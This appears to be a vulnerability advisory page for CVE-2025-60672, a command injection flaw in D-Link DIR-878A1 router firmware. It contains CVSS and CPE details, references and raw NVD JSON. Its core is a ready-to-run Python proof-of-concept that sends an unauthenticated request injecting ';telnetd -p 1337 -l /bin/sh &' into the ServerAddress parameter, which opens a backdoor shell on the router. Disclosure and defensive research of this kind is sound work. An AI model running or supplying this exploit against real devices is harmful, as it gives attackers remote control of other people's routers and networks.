Security Vulnerability Report
CVE-2025-60672 CVSS 6.5 MEDIUM

Published: 2025-11-13 19:15:48
Last Modified: 2025-11-17 19:04:14

Description

An unauthenticated command injection vulnerability exists in the D-Link DIR-878A1 router firmware FW101B04.bin. The vulnerability occurs in the 'SetDynamicDNSSettings' functionality, where the 'ServerAddress' and 'Hostname' parameters in prog.cgi are stored in NVRAM and later used by rc to construct system commands executed via twsystem(). An attacker can exploit this vulnerability remotely without authentication by sending a specially crafted HTTP request, leading to arbitrary command execution on the device.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-878_firmware:1.01b04:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-878:a1:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-878A1 firmware FW101B04.bin

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-60672 PoC - D-Link DIR-878A1 Command Injection
# Target: D-Link DIR-878A1 router with firmware FW101B04.bin
target_ip = "192.168.0.1"  # Router IP address
target_url = f"http://{target_ip}/prog.cgi"

# Malicious payload - injects a command that starts a telnet listener
# The ServerAddress parameter is vulnerable to command injection
malicious_payload = ";telnetd -p 1337 -l /bin/sh &"

# Prepare the exploit request
data = {
    "SetDynamicDNSSettings": "1",
    "ServerAddress": malicious_payload,
    "Hostname": "attacker-controlled-hostname",
    "Enable": "1"
}

print(f"[*] Exploiting CVE-2025-60672 on {target_ip}")
print(f"[*] Sending malicious payload: {malicious_payload}")

try:
    # Send the crafted HTTP request without authentication
    response = requests.post(target_url, data=data, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully")
        print("[+] Payload should be stored in NVRAM and executed by rc daemon")
        print("[+] Telnet backdoor should be active on port 1337")
    else:
        print(f"[-] Unexpected response: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Additional verification - check if router responds to our command
verify_url = f"http://{target_ip}/status.cgi"
try:
    verify_response = requests.get(verify_url, timeout=10)
    print(f"[*] Router status check: {verify_response.status_code}")
except requests.exceptions.RequestException:
    print("[*] Router may be rebooting or payload executed")

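References

http://d-link.com (Product)
https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-878/CVE-2025-60672.md (Exploit, Third Party Advisory)
https://www.dlink.com/en (Product)
https://www.dlink.com/en/security-bulletin/ (Vendor Advisory)
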
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60672", "sourceIdentifier": "[email protected]", "published": "2025-11-13T19:15:48.040", "lastModified": "2025-11-17T19:04:14.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated command injection vulnerability exists in the D-Link DIR-878A1 router firmware FW101B04.bin. The vulnerability occurs in the 'SetDynamicDNSSettings' functionality, where the 'ServerAddress' and 'Hostname' parameters in prog.cgi are stored in NVRAM and later used by rc to construct system commands executed via twsystem(). An attacker can exploit this vulnerability remotely without authentication by sending a specially crafted HTTP request, leading to arbitrary command execution on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-878_firmware:1.01b04:*:*:*:*:*:*:*", "matchCriteriaId": "CF6C5938-ACC7-4DD4-B3EF-AD64468AD60F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-878:a1:*:*:*:*:*:*:*", "matchCriteriaId": "70A35F2E-E46F-47CF-BF0F-9CF9A3242EDC"}]}]}], "references": [{"url": "http://d-link.com", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-878/CVE-2025-60672.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}